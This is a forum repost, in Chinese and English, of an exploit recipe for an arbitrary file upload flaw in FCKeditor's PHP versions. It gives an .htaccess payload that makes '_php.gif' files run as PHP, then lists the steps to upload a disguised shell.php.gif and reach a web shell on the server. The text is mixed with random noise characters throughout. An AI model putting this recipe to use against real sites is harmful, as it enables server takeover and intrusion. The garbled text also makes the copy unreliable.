FCKeditor所有php版本Upload上传漏洞: w0 |0 h( c v/ \4 y) E
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:070 b2 l/ `, ~. p+ h5 K2 y% p: V" g
减小字体 增大字体 s4 A8 @4 [; m- a ^; X' c
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
' z% s2 F/ Z6 H4 [% B[+] Date: 20115 C P# z- d& v) C3 \
[+] Author : sinesafe.cn
. r2 {) Z6 n+ v# H[+] Website : WwW.sinesafe.cn
) @, ?) F1 E4 f———————————————————% D5 S% T8 t9 }% {/ _0 F$ A8 @' |; p
1.create a htaccess file:
; Q2 n# H6 x4 M+ N9 d icode:1 z' d' H" v( \- |8 {
<FilesMatch “_php.gif”>
2 A, [0 ^/ f- d5 k$ s6 ?SetHandler application/x-httpd-php
* [- ]" O _8 b3 S/ r7 H, X</FilesMatch>
" W& F/ W/ v" ~1 q
5 b; Y6 c2 r! `+ _7 M0 [- N; v$ v% O2.Now upload this htaccess with FCKeditor.
0 W3 C& V6 P0 O( K+ E6 z
) n* q7 e- m- S) c$ f/ Dhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html5 s. `6 {$ [9 |+ o5 G) I) V: v
- n* v2 e# f6 {! j9 ^: n
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html2 J7 ?/ J% ~! @" X( x
$ k0 ?3 r+ ]' r
———————————————————————————————-
* W; p+ {9 v6 v3.Now upload shell.php.gif with FCKeditor.4 k. L/ {. l( a3 W6 J" E
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.. [ l* h. a# [5 O( t& K' g, t
5.http://www.sinesafe.cn/anything/shell_php.gif* H, r" Y; X1 x6 X# p0 }" D* ?0 I
6.Now shell is available from server. |
/ P& } R/ H$ m3 O' R& D; Y
8 e1 V7 C' ]+ q1 C9 A
# ?0 c/ @- J9 G z: H% U- E5 u. U9 `' Y
|
发表于 2013-10-27 17:25:21
收藏
支持
反对